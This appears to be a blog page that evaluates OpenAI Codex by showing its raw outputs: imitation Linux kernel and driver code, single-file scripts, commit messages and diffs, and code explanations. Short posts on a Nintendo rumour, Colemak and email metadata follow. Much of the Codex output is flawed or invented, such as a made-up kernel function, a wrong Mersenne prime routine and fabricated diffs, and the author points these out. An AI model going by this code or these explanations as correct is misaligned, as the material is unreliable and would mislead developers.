I don’t have access to GitHub Copilot, but anyone can download and install the extension. It just doesn’t work without being able to authenticate with the backend. Taking a glance at the Copilot source code, it seems that it is doing a lot more than just sending the current line to the Codex model. Copilot actually tries to parse the code into an AST, and uses that information to help generate results. It seems it is using that to decide when to generate results, and when to stop the generation. This prevents issues with Codex auto-completing the current function, and then deciding to write more functions after that. This is probably why Copilot only supports a couple languages, while Codex can handle more: Copilot hasn’t implemented parsing support for any other ones.

Context

Codex only supports up to 4096 tokens (where 1 token is around 4 characters of English) of combined context and output. As such, it doesn’t work as well with large codebases, since it can’t know about everything that it can do in a codebase.

This is actually somewhat mitigated for code that Codex was trained on (and especially for code that is popular enoguh that Codex has seen it multiple times), since in those cases Codex knows what the codebase looks like. When Codex is prompted to write code for Linux kernel, or kernel modules, it can write code that looks like other code in the kernel, and seems like actual kernel source code:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.25
Presence penalty: 0.1
(eventually gets into loop)
// Linux kernel memory management utilites // // Copyright (C) 2012 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU GPLv3 license. #include "util.h" // dprintf #include "mmu.h" // mmu_read_cr0, mmu_write_cr0, mmu_read_cr3, mmu_write_cr3 #include "vmm.h" // vmm_alloc, vmm_free, vmm_get_physaddr, vmm_get_page, vmm_get_page2 #include "paging.h" // paging_init, paging_map, paging_unmap #include "multiboot.h" // multiboot_find, multiboot_getmemmap #include "elf.h" // elf32_load #include "elf64.h" // elf64_load #include "elf32.h" // elf32_load #include "elf64.h" // elf64_load #include "x86emu/x86emu.h" // x86emu // Initialize the MMU and set up the kernel page table. This is called by the // boot code once it has finished loading the kernel image and setting up the // stack and heap. It is also called by the kernel when it is running in a // virtualized environment (such as QEMU). The kernel page table is used to map // physical addresses to virtual addresses for use by the kernel itself (e.g., to // access its data structures). The kernel page table is also used to map virtual // addresses to physical addresses for use by the VMM (virtual memory manager). In // this case, the VMM will be using a different page table that maps virtual pages // to physical pages for use by user processes. The kernel page table is also used // to map virtual addresses to physical addresses for use by the MMU (memory manager) // when translating virtual addresses into physical addresses for use by user processes. void mmu_init(void) { dprintf(1, "\nInitializing MMU...\n"); // Initialize the MMU and set up the kernel page table: // Set up a temporary page directory that maps all pages to themselves: uintptr_t tempdir = vmm_alloc(1);

Note that most of the files it #includes actually have different names in the real kernel source code. But the comment it writes for mmu_init is very impressive: it’s not a direct copy of some other comment in the kernel source code, but is actually better then similar real comments. For comparision, here’s an actual MMU initializer from the kernel source:

/*
 * MMU_init sets up the basic memory mappings for the kernel,
 * including both RAM and possibly some I/O regions,
 * and sets up the page tables and the MMU hardware ready to go.
 */
void __init MMU_init(void)
{

Codex produced what seems to be a better header comment! Codex’s ability also raises some interesting copyright questions: does Codex know enough about the Linux kernel to be a derivative work of it? It certainly knows a lot about the structure and style of the kernel.

Codex is quite good at working with the Linux kernel. Here, I instructed Codex to write a driver. The generated code looks a lot like a real kernel driver. It delcares the right metadata, uses goto-style error handling, and overall looks like the sort of code you would see in the Linux kernel.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/* Kernel driver for USB boot keyboard */ #include <linux/kernel.h> #include <linux/errno.h> #include <linux/init.h> #include <linux/slab.h> #include <linux/module.h> #include <linux/kref.h> #include <linux/usb.h> #include <linux/input.h> #include <linux/hid.h> #include <linux/moduleparam.h> #define DRIVER_VERSION "v0.6" #define DRIVER_AUTHOR "Arnaldo Carvalho de Melo <[email removed]>" #define DRIVER_DESC "USB boot keyboard driver" static int debug; module_param(debug, bool, 0644); MODULE_PARM_DESC(debug, "Debug enabled or not"); #define USB_VENDOR_ID_LOGITECH 0x046d #define USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER 0xc52b #define USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER_2 0xc52f struct usb_boot_kbd { struct kref kref; struct usb_device *usbdev; struct input_dev *input; char name[128]; }; static void usb_boot_kbd_delete(struct kref *kref) { struct usb_boot_kbd *boot_kbd = container_of(kref, struct usb_boot_kbd, kref); usb_put_dev(boot_kbd->usbdev); input_unregister_device(boot_kbd->input); kfree(boot_kbd); } static void usb_boot_kbd_disconnect(struct usb_interface *intf) { struct usb_boot_kbd *boot_kbd; struct input_dev *input; boot_kbd = usb_get_intfdata(intf); usb_set_intfdata(intf, NULL); if (!boot_kbd) return; input = boot_kbd->input; boot_kbd->usbdev->bus->needs_remote_wakeup = 0; usb_kill_urb(boot_kbd->usbdev->urb); usb_boot_kbd_delete(&boot_kbd->kref); input_unregister_device(input); } static int usb_boot_kbd_probe(struct usb_interface *intf, const struct usb_device_id *id) { struct usb_device *dev = interface_to_usbdev(intf); struct usb_boot_kbd *boot_kbd; struct input_dev *input_dev; int error; if (dev->descriptor.bDeviceClass != USB_CLASS_HID || dev->descriptor.bDeviceProtocol != 0 || le16_to_cpu(dev->descriptor.idVendor) != USB_VENDOR_ID_LOGITECH || (le16_to_cpu(dev->descriptor.idProduct) != USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER && le16_to_cpu(dev->descriptor.idProduct) != USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER_2)) return -ENODEV; boot_kbd = kzalloc(sizeof(struct usb_boot_kbd), GFP_KERNEL); input_dev = input_allocate_device(); if (!boot_kbd || !input_dev) { error = -ENOMEM; goto fail1; } kref_init(&boot_kbd->kref); boot_kbd->usbdev = dev; boot_kbd->input = input_dev; snprintf(boot_kbd->name, sizeof(boot_kbd->name), "Logitech Unifying Receiver %04x:%04x", le16_to_cpu(dev->descriptor.idVendor), le16_to_cpu(dev->descriptor.idProduct)); usb_make_path(dev, boot_kbd->name, sizeof(boot_kbd->name)); strlcat(boot_kbd->name, ":input0", sizeof(boot_kbd->name)); input_dev->name = boot_kbd->name; input_dev->phys = boot_kbd->name; usb_to_input_id(dev, &input_dev->id); input_dev->dev.parent = &intf->dev; input_dev->evbit[0] = BIT_MASK(EV_KEY) | BIT_MASK(EV_LED) | BIT_MASK(EV_REP); input_dev->ledbit[0] = BIT_MASK(LED_NUML) | BIT_MASK(LED_CAPSL) | BIT_MASK(LED_SCROLLL) | BIT_MASK(LED_COMPOSE) | BIT_MASK(LED_KANA); input_dev->keycode = boot_kbd->name; input_dev->keycodesize = sizeof(unsigned char); input_dev->keycodemax = ARRAY_SIZE(boot_kbd->name); usb_fill_int_urb(dev->urb, dev, usb_rcvintpipe(dev, dev->actconfig->desc.bEndpointAddress), dev->urb->transfer_buffer, 8, usb_boot_kbd_irq, boot_kbd, dev->actconfig->desc.bInterval); dev->urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP; error = input_register_device(boot_kbd->input); if (error) goto fail2; usb_set_intfdata(intf, boot_kbd); return 0; fail2: kref_put(&boot_kbd->kref, usb_boot_kbd_delete); fail1: input_free_device(input_dev); kfree(boot_kbd); return error; } static struct usb_driver usb_boot_kbd_driver = { .name = "usb_boot_kbd", .probe = usb_boot_kbd_probe, .disconnect = usb_boot_kbd_disconnect, .id_table = usb_boot_kbd_ids, }; static int __init usb_boot_kbd_init(void) { int retval; retval = usb_register(&usb_boot_kbd_driver); if (retval) printk(KERN_ERR "Unable to register USB boot keyboard driver\n"); return retval; } static void __exit usb_boot_kbd_exit(void) { usb_deregister(&usb_boot_kbd_driver); } module_init(usb_boot_kbd_init); module_exit(usb_boot_kbd_exit); MODULE_AUTHOR(DRIVER_AUTHOR); MODULE_DESCRIPTION(DRIVER_DESC); MODULE_LICENSE("GPL"); MODULE_DEVICE_TABLE(usb, usb_boot_kbd_ids);

Single-file scripts

Codex works best for generating single-file scripts. Here is an example I find impressive: I gave Codex a vague prompt, and it filled in the blanks. It’s not quite right, since it doesn’t authenticate the request to the Gmail API, but adding proper authentication could be done quite easily (HTTP Basic Auth is supported).

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/usr/bin/env node // Checks if too many emails are unread var fs = require('fs'); var request = require('request'); var config = require('./config.json'); var options = { url: 'https://mail.google.com/mail/feed/atom', headers: { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3)↵ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' } }; request(options, function(error, response, body) { if (!error && response.statusCode == 200) { var feed = new (require('feedparser'))(body); var unread = feed.entries.filter(function(entry) { return entry.title.indexOf('unread') > -1; }).length; if (unread > config.maxUnread) { var message = 'You have ' + unread + ' unread emails!'; var options = { host: 'api.pushover.net', port: 443, path: '/1/messages.json', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': message.length } }; var req = https.request(options, function(res) { res.on('data', function(d) { console.log(d); }); }); req.on('error', function(e) { console.log(e); }); req.write(querystring.stringify({ token: config.pushoverToken, user: config.pushoverUser, message: message })); req.end(); } } });

Subtle errors

Often Codex will write code that looks right at first glance, but actually has subtle errors. Try to spot the error:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Count the number of files in the current directory, and append the count to↵ ~/count.tsv ls -1 | wc -l > ~/count.tsv

In that snippet, it overwrites the existing contents of ~/count.tsv by using > instead of appending with >>. Changing the prompt even slightly fixes it:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Count the # of files in the current directory, append that to ~/count.tsv # Count the number of files in the current directory num_files=$(ls -1 | wc -l) # Append the count to ~/count.tsv echo "$num_files" >> ~/count.tsv

Another one: here, Codex generates the nth prime, not the the nth mersenne prime.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
// Finds the nth mersenne prime fn nth_mersenne_prime(n: usize) -> u64 { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i) { primes.push(i); } i += 2; } primes[n - 1] }

Writing commit messages

We can try feeding Codex a diff and asking it for a commit message. Codex often struggles here due to lacking enough context. I picked a commit with a commit message that is fairly clear from the diff, “Deprecate llvm_asm!” Can Codex write a commit message?

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
diff --git a/library/core/src/macros/mod.rs b/library/core/src/macros/mod.rs index 87fdbf2dca392..476f37699ee73 100644 --- a/library/core/src/macros/mod.rs +++ b/library/core/src/macros/mod.rs @@ -1347,6 +1347,10 @@ pub(crate) mod builtin { issue = "70173", reason = "prefer using the new asm! syntax instead" )] + #[rustc_deprecated( + since = "1.56", + reason = "will be removed from the compiler, use asm! instead" + )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { --- Commit message: "rustfmt: fix rustfmt_skip attribute"

The commit message looks like the sort of one you would see in rustc, but it doesn’t make sense here. rustfmt is unchanged by the provided diff. I’ve tried writing a better prompt to get Codex to write better commit messages, but I haven’t found a prompt that can convince Codex to consistently write good commit messages. Adding example messages for other commits can sometimes give better results, but sometimes Codex will just regurgitate one of the commit messages it saw before. Asking for an explanation of the commit, instead of asking for a commit message directly, sometimes gives interesting results.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
diff --git a/library/core/src/macros/mod.rs b/library/core/src/macros/mod.rs index 87fdbf2dca392..476f37699ee73 100644 --- a/library/core/src/macros/mod.rs +++ b/library/core/src/macros/mod.rs @@ -1347,6 +1347,10 @@ pub(crate) mod builtin { issue = "70173", reason = "prefer using the new asm! syntax instead" )] + #[rustc_deprecated( + since = "1.56", + reason = "will be removed from the compiler, use asm! instead" + )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { --- Here is how I explained the effect of this commit: > The `llvm_asm!` macro was deprecated in 1.56.0 because it was not used > anywhere in the codebase. > > The `asm!` macro is a more general macro that allows for inline assembly > with more features than the `llvm_asm!` macro. > > The `llvm_asm!` macro will be removed in 1.58.0, and the `asm!` macro will > remain as a more general macro for inline assembly. --- The commit message is: ```text [1.56.0] Deprecate llvm_asm! in favor of asm! (#70173) ``` ---

This is quite impressive: it managed to extract a link to a relevent GitHub issue from the context lines, add wrote a good explanation. The commit message it wrote after the explanation was quite good as well.

Writing diffs

Let’s try that in reverse: generating a diff, given a commit message.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
Date: Thu, 29 Jul 2021 16:51:32 +0200 Subject: [PATCH] Deprecate llvm_asm! --- src/libcore/macros.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/libcore/macros.rs b/src/libcore/macros.rs index fc7a8b5..c9d8d2f 100644 --- a/src/libcore/macros.rs +++ b/src/libcore/macros.rs @@ -13,7 +13,7 @@ pub mod asm; pub mod mem; pub mod ptr; pub mod raw; -pub mod simd; +#[macro_use] pub mod simd; pub mod str; pub mod sync; pub mod time; -- 2.21.0

That is a correctly formatted diff, but for a file that doesn’t exist. I didn’t expect Codex to do well here, since it doesn’t know what the file it needs to modify currently looks like. Let’s see if giving it some context will help. This is making it easy for Codex, since I’ve removed all the other lines in the file. All Codex needs to do is figure out what lines to add:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
library/core/src/macros/mod.rs: /// LLVM-style inline assembly. /// /// Read the [unstable book] for the usage. /// /// [unstable book]: ../unstable-book/library-features/llvm-asm.html #[unstable( feature = "llvm_asm", issue = "70173", reason = "prefer using the new asm! syntax instead" )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { ("assembly template" : $("output"(operand),)* : $("input"(operand),)* : $("clobbers",)* : $("options",)*) => { /* compiler built-in */ }; } Date: Thu, 29 Jul 2021 16:51:32 +0200 Subject: [PATCH] Deprecate llvm_asm! --- src/macros/mod.rs | 1 + 1 file changed, 1 insertion(+) diff --git a/src/macros/mod.rs b/src/macros/mod.rs index ee9e8c9..f9d8f8e 100644 --- a/src/macros/mod.rs +++ b/src/macros/mod.rs @@ -1,3 +1,4 @@ +//! This module contains the `llvm_asm!` macro. /// The `llvm_asm!` macro provides a #[unstable(feature = "llvm_asm", issue = "70173")] /// way to use inline assembly. @@ -6,7 +7,6 @@ /// /// ## Example /// -/// ``` -/// #[macro_use] -/// extern crate llvm_asm; -/// /// llvm_asm!("mov $1, $2" /// : "=r"(a), "=r"(b) /// : "r"(c), "r"(d) -- 2.22.1

That doesn’t do it either. Perhaps there is some good way to prompt Codex into writing diffs, but I haven’t found any good way to tell Codex to make a change to some existing code.

Explaining code

Another interesting use-case for Codex is getting it to explain code in natural language. I had to go through many iterations of the prompt in order to get the type of explanations I liked: by changing the prompt can, you change the type of results you get. Replacing “software developer” with “second grader” makes the explanations simpler. The “at a high level” part helps discourage the model from just doing a line-by-line explanation. I also find that increasing the temperature is beneficial here, since explanations are less structured than source code.

Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
export function isLeapYear(date: Date) { var year = date.getFullYear(); if ((year & 3) != 0) return false; return ((year % 100) != 0 || (year % 400) == 0); } ''' Here's how I explained that code to a software developer at a high level: I have a function called isLeapYear that takes a date and returns a boolean. The date argument is the year to check. The code checks whether the year is divisible by four (modulo). If it's not, then it's not a leap year. Otherwise, it checks if the year is divisible by 100 (modulo). If it is, then we want to see if it's also divisible by 400. If the year is not divisible by 100, then we don't need to check 400. We can use the modulo operator to divide by things like 2 and get the remainder (2 goes into the year number 50 two times, with 10 leftover). We can also use the modulo operator to divide by things like 4 and see if the remainder is 0. If it's zero, then the year number is evenly divisible by 4. If it's not, then it's not. The modulo operator is useful for seeing if a number is evenly divisible by another number, or for finding the remainder when dividing. I hope this helps!
Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
export function getDOY(date: Date) { var dayCount = [0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334]; var mn = date.getMonth(); var dn = date.getDate(); var dayOfYear = dayCount[mn] + dn; if (mn > 1 && isLeapYear(date)) dayOfYear++; return dayOfYear; } ''' Here's how I explained that code to a software developer: "This is a function that takes a date object and returns the day of the year. The day of the year is the number of days that have passed since January 1st. If the month is after February, then we add one to the day of the year because February 29th is counted twice. The day of the year is the sum of the days in the months before the current month, plus the current day. The day of the year is a number between 1 and 365. If the year is a leap year, then we add one to the day of the year because February 29th is counted twice." I'm not sure if this is the best explanation, but it's the clearest I could find.

Let’s try something harder: a data data structure function from the Linux kernel. This explanation is very impressive: the code doesn’t even explictly mention that it is a red-black tree. The only clue is the rb in the function name, and the contents of the function. Despite this, Codex delivers an explanation of red-black trees. Note that the __rb_insert_color function is totally made up by Codex: it doesn’t actually exist in the kernel source code. But Codex explains it anyways!

Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
static inline void __rb_rotate_set_parents(struct rb_node *old, struct rb_node *new, struct rb_root *root, int color) { struct rb_node *parent = rb_parent(old); new->__rb_parent_color = old->__rb_parent_color; rb_set_parent_color(old, new, color); __rb_change_child(old, new, parent, root); } ''' Here's how I explained that code to a software developer: The function takes the node that is going to be rotated from its parent, the node that is going to take the place of the old node, the root node, and a boolean value indicating whether or not the new node is red. The first thing it does is find the parent of the old node. It then sets the parent pointer of the new node to the old node's parent. It then sets the new node's color to the old node's color. It finally changes the child pointer of the old node's parent to point to the new node. After this function completes, the old node is no longer a child of its parent, and it has been "rotated" into the new node's position. Now that we know how __rb_rotate_set_parents() works, we can look at __rb_insert_color() which implements both the 2-3 and the 2-3-4 tree insertion algorithms. ``` static __always_inline void __rb_insert_color(struct rb_node *node, struct rb_root *root) { struct rb_node *parent, *gparent; while ((parent = rb_parent(node)) && rb_is_red(parent)) { gparent = rb_parent(parent); if (parent == gparent->rb_left) { { __rb_rotate_set_parents(parent, node, root, RB_BLACK); parent = node; } { __rb_rotate_set_parents(gparent, parent, root, RB_RED); } } else { { __rb_rotate_set_parents(parent, node, root, RB_BLACK); parent = node; } { __rb_rotate_set_parents(gparent, parent, root, RB_RED); } } } rb_set_parent_color(node, NULL, RB_BLACK); } ``` This function is responsible for making the new node that was passed in black and setting the parent of the new node to be NULL. Next it checks to see if the parent of the new node is red. If it is, then we need to rebalance the tree. We start by finding the grandparent of the new node. If the new node is the left child of its parent, then we rotate right around the parent. Specifically, we swap the colors of the parent and the grandparent, change the parent pointer of the new node to the grandparent, and then change the child pointer of the grandparent to point to the new node. If the new node is the right child of its parent, then we rotate left around the parent. Again, we swap the colors of the parent and the grandparent, change the parent pointer of the new node to the grandparent, and then change the child pointer of the grandparent to point to the new node. After this is done, we need to check whether or not the grandparent is red. If it is, then we've created a 4-node. In this case, we need to recolor and rebalance the tree. If the grandparent is black, then we're all done. If you've been following along, then you'll notice that __rb_insert_color() basically implements the same rebalancing procedure every time. This is because the __rb_insert_color() function is called any time a new node is added to the tree, and that includes when the root is added. So, how do we know when the root is added? We can look at the code: ``` static void rb_insert_color(struct rb_node *node, struct rb_root *root) { struct rb_node *parent = NULL; while (node->__rb_parent_color) { parent = rb_parent(node); if (!parent) goto out; if (parent->rb_left == node) { if (__rb_is_black(parent)) goto out; __rb_rotate_right(parent, root); } else { if (__rb_is_black(parent)) goto out; __rb_rotate_left(parent, root); } } rb_erase_augmented(node, root); node->__rb_parent_color = RB_BLACK; out: ; } ``` The code checks the parent of the node, and if the node has a parent then it checks if the parent is black. If it is, then we're done. If the node's parent is red, then we need to rebalance the tree. If the node is the left child of its parent, then we rotate right around the parent. If the node is the right child of its parent, then we rotate left around the parent. If the node has no parent, then we've reached the root, and we're done. If you've been following along, then you'll notice that the __rb_insert_color() function basically implements the same rebalancing procedure every time. This is because the __rb_insert_color() function is called any time a new node is added to the tree, and that includes when the root is added. And that's how we insert into a red-black tree. I hope you've enjoyed this journey through the implementation details of the red-black tree. I'm sure there's plenty more to learn about the implementation of the red-black tree, but I'm not going to discuss anything else right now. To recap, here's a list of all the different rebalancing procedures that are used to maintain balance in the red-black tree: 1. __rb_rotate_left() 2. __rb_rotate_right() 3. __rb_insert_color() 4. __rb_erase() 5. __rb_erase_augmented() There's a lot of code in rb.c just for rebalancing the red-black tree, but this is the gist of how it works. I hope you've enjoyed this journey through the implementation details of the red-black tree. So that's it for this video. Thank you for watching. I'll see you in the next video.

Weaknesses

Stopping

Codex will often generate more than the desired code. Codex will often generate a function from a comment, and then start generate whatever functions it thinks should be written next. The easiest way to work around this is to stop generating tokens once you see something like } at the same indentation level as the prompt. You could also be more advanced and parse the Codex outputs to stop when there is a full AST for a function, as Copilot seems to do. In this blog post, I have manually decided where to cut off outputs.

Dependencies

Codex will often reference other code that don’t actually exist. Here, it references a is_prime function without actually writing it.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/// Finds the nth prime. fn nth_prime(n: usize) -> usize { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i, &primes) { primes.push(i); } i += 2; } primes[n - 1] }

Most of the time we can fix this by just prompting Codex with the start of the missing function declaration:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/// Finds the nth prime. fn nth_prime(n: usize) -> usize { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i, &primes) { primes.push(i); } i += 2; } primes[n - 1] } fn is_prime(n: usize, primes: &Vec<usize>) -> bool { for p in primes { if n % p == 0 { return false; } } true }

Now the code works.

Switching languages

Sometimes Codex will suddenly go: “Suprise! That was actually just part of a string in a different language”. I find this happens most with languages that are often embedded, like LaTeX and HTML.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
\documentclass[]{article} \usepackage{amsmath,amsthm,amssymb} \newtheorem{thm}{Theorem} %opening \title{Proof of Theorem} \author{} \date{} \begin{document} \maketitle %body \begin{abstract} \end{abstract} \section{Theorem} \begin{proof} \end{proof} \end{document} """ def main(): if len(sys.argv) < 2: print("Usage: python3 proof.py ") sys.exit(1) theorem = sys.argv[1] with open("theorem.tex", "w") as f: f.write(template.replace("Theorem", theorem)) os.system("pdflatex theorem.tex") os.system("rm theorem.aux theorem.log") if __name__ == "__main__": main()

You can work around this by stopping at the right point: for LaTeX, when you see \end{document} just stop requesting tokens. Some prompt engineering indicating that it’s just a single file might also help.

Inability to backtrack

There’s no easy way to tell Codex to generate in the middle of some text. You either need to get it to generate at the end, or otherwise convey the text after the generation.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
In the code: ``` function d(a, b) { ??? } console.assert(d(10, 20) === 200); ``` ??? is: `return a * b;`

That demo was cherry-picked for a good result. Most of the tests I tried didn’t work out well. Most of the time Codex isn’t able to figure that sort of problem out. Here is a fairly typical result, where Codex gives an answer that doesn’t make any sense (a and b aren’t defined here).

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
In the code: ``` function d() { ??? } console.assert(d() === 8); ``` ??? is: `return a + b;`

Perhaps there is some better way to prompt Codex to generate code in the middle of other code, but I haven’t found any.

Conclusion

(edit: see the introduction at the top for what you are looking for if you just jumped to the conclusion)

That’s it! I had a fun time exploring what Codex can do, and I can’t wait to see what will happen next in the code generation space!.


  1. It probably also works with open source builds (such as Code - OSS or VSCodium) too, although I am unable to verify this. Microsoft has released other proprietary plugins that utilize DRM to ensure that they only run on offical builds↩︎

  2. Oddly, that link says I got #75, but the leaderboard page says I got #79. I’m going with the higher number. ↩︎

  3. That’s not to say PHP is a bad language. It’s not impossible to write secure PHP code, and knowing the basics of PHP security will get you a long way. PHP has done a lot to make the language more secure, but there is a lot of really insecure PHP code out there. PHP is disadvantaged by having much more historical baggage than newer languages. ↩︎

  4. Although both versions still have a reflected XSS issue by echoing the $name without escaping it. But this would only allow the user making the request to XSS themselves, without giving them complete database control. It’s an improvement! ↩︎

openai

By · · 0 minute read

Accidentally causing a Switch rumor

By · · 4 minute read

Recently I stumbled upon this Reddit post in a subreddit for gaming rumors while trying to find information about Nintendo’s OSS code. This is a page on Nintendo’s website with some source code that they are obligated to release1:

The Nintendo OSS “Open Source Software” webpage is rarely updated unless a high-profile OS release occurs. It usually takes months for small updates to have source published (like v12.0.0 for example, still not there).

The page was updated sometime this weekend to add the text “or later version” to “Nintendo Switch [Ver. 11.0.0]” and “Wii U [Ver 5.5.2]”. This is such a minor update it seems unlikely that devs would bother tidying this page unless they anticipate adding more to it soon. (ie: adding OSS for new software/hardware).

Current page: https://www.nintendo.co.jp/support/oss/index.html

Cached page before this page was updated (Most recent I could find, June 5th): https://webcache.googleusercontent.com/search?q=cache:B8KOgxP1BxkJ:https://www.nintendo.co.jp/support/oss/index.html+&cd=2&hl=en&ct=clnk&gl=us

Take as a grain of salt, but devs usually don’t update low-profile webpages for no reason, especially the same weekend as E3.

This was not a result of Nintendo tidying up their page while preparing for something. I was the person who instigated that change. Around a week earlier, I also noticed that “v12.0.0 for example, [was] still not there”. Nintendo OSS code has given me one great blog post before, and I was getting desperate for some content. Instead of doing nothing, I emailed Nintendo of America legal’s department to see what was up. A bit of digging turned up that their email address was noalegal [amot] noa.nintendo.com, and so I asked them:

Hi there! I am trying to find the OSS (open source software) included in version 12.0 of the Nintendo Switch system software. It seems that https://www.nintendo.co.jp/support/oss/ only goes up to version 11.0, how could I get the OSS for version 12.0?

Five days later, I got a reply (in all italics for whatever reason):

Thank you for your inquiry about the open source software in version 12.0 of the Nintendo Switch console. The OSS has not changed since version 11.0.0. The Nintendo open source software source code webpage has been updated to reflect this more clearly, indicating that the software made available is for version 11.0.0 and later.

Best regards,

Legal Department

Nintendo of America Inc.

This wasn’t the devs randomly tidying up a page, they did it because I asked them about it. So I guess the moral of the story is that most gaming rumors are wrong (to be fair, the post did say to take it with a grain of salt). People will notice random things that Nintendo does and assume that there is some deeper reason for it. Things are usually not done for deeper reasons. Also yay I caused a gaming rumor!

(also Switch OSS for 12.1.0 is now out! does seem moderately interesting, check it out.)


  1. Not that you can actually do anything with the source code other than look at it. The source code needs to be statically linked against the Nintendo Switch SDK to compile, and the only way to get your hands on the Switch SDK is to become a licensed Switch developer (which involves signing a NDA). ↩︎

typing

By · · 0 minute read

Using Colemak for a year

By · · 4 minute read

Around a year ago, I decided to try using the Colemak keyboard layout. It is an alternative to the standard QWERTY layout that is supposed to be faster to type with, and has better hand ergonomics. QWERTY is a very old keyboard layout that was designed for old typewriters, and as such the positioning of keys is less than ideal. Colemak is designed for modern keyboards, and positions keys to minimize the distance travelled by fingers. Unlike some other layouts (such as Dvorak), Colemak isn’t completely different from QWERTY. Common keyboard shortcuts like CTRL-C, CTRL-V, CTRL-X, CTRL-A are kept in the same place, the bottom row is almost entirely unchanged, most keys are typed with the same hand as QWERTY, and many keys aren’t even moved at all. This gives the benefits of a better keyboard layout while minimizing the amount that needs to be relearned from scratch.

Setting up for Colemak

Most operating systems have support for Colemak built in. Some notes:

  • The Debian 10 installer doesn’t have an option in the installer but you can change it once installed
  • GNOME and Plasma both support Colemak
  • ChromeOS supports Colemak, and even allows remapping the search key to backspace
  • Windows doesn’t have Colemak support built in, you have to QWERTY your way through the setup process, then install Colemak from the Internet :(

Learning Colemak

While I was able to type fairly fast with QWERTY, I never learned to touch type the “proper” way. I just kinda let my fingers sprawl across the keyboard, and my fingers didn’t return the home row. I was forced to learn to properly touch type with Colemak, since I couldn’t look at the keyboard while typing – the letters on the keyboard were unrelated to the actual letters they typed!

It took me a few months to be able to type in Colemak at my former QWERTY speeds. I initially used Colemak Academy to learn a few keys at a time. Once I was able to type with the whole keyboard (albeit very slowly), I used Monkeytype to improve my speed and accuracy. When I was ready, I stopped using QWERTY entirely, and used just Colemak for all of my typing. This was rough at first, due to my slowness. Having all of my typing being significantly slower felt bad at first, but in a few weeks I was able to type at a normal pace again.

A graph of WPM vs time, going from around 50 WPM to around 80 WPM

2 months of typing practice, from around when I switched to Colemak full time

Using Colemak

Once I got good at typing with Colemak, it felt better for me to type. Sometimes when I am typing it feels like I am doing an intricate dance with a keyboard, a feeling I never got with QWERTY. It feels very nice to type with Colemak.

One annoying thing with Colemak is that it isn’t QWERTY, and how applications handle keyboard shortcuts can vary quite a bit, since the logical key layout (Colemak) differs from the scancodes reported from the keyboard (which are in QWERTY). Most just use logical key pressed – if you want to save in Blender, enter CTRL+(whatever key corresponds to S). But some applications use the physical key pressed – to save in VSCodium, you enter CTRL+(the physical key labelled with S). This mismatch between applications often leads to confusion for me. This is especially annoying when using the applications through a VM layer that remaps scancodes. So when I am using VSCodium normally, it is based on physical keys, but when I am using it through Crostini, it is based on logical keys.

That being said, I have quite enjoyed using Colemak. If you can handle having slowed typing for a few months, I would recommend learning Colemak. It is an investment in your future.

Security​Classification​Level in email headers

By · · 2 minute read

Recently I got a non-automated email from a government agency. While the email was interesting, what was more interesting was the email headers, one of which looked like

x-titus-metadata-40: eyJDYXRlZ29yeUxhYmVs...

It was a long base64 encoded JSON blob ({"... is encoded as ey... in base64 making it easy to find base64 JSON in random text). What is this metadata? Decoding+beautifying it we get

{
    "CategoryLabels": "",
    "Metadata": {
        "ns": "http://www.titus.com/ns/Canada Revenue Agency",
        "id": "c8ba42f7-485a-4f67-9d1c-d8894d61b092",
        "props": [{
            "n": "SecurityClassificationLevel",
            "vals": [{
                "value": "UNCLASSIFIED"
            }]
        }, {
            "n": "ENTRUSTPB",
            "vals": []
        }, {
            "n": "ENTRUSTPA",
            "vals": []
        }, {
            "n": "LanguageSelection",
            "vals": [{
                "value": "ENGLISH"
            }]
        }, {
            "n": "VISUALMARKINGS",
            "vals": [{
                "value": "NO"
            }]
        }]
    },
    "SubjectLabels": [],
    "TMCVersion": "18.8.1929.167",
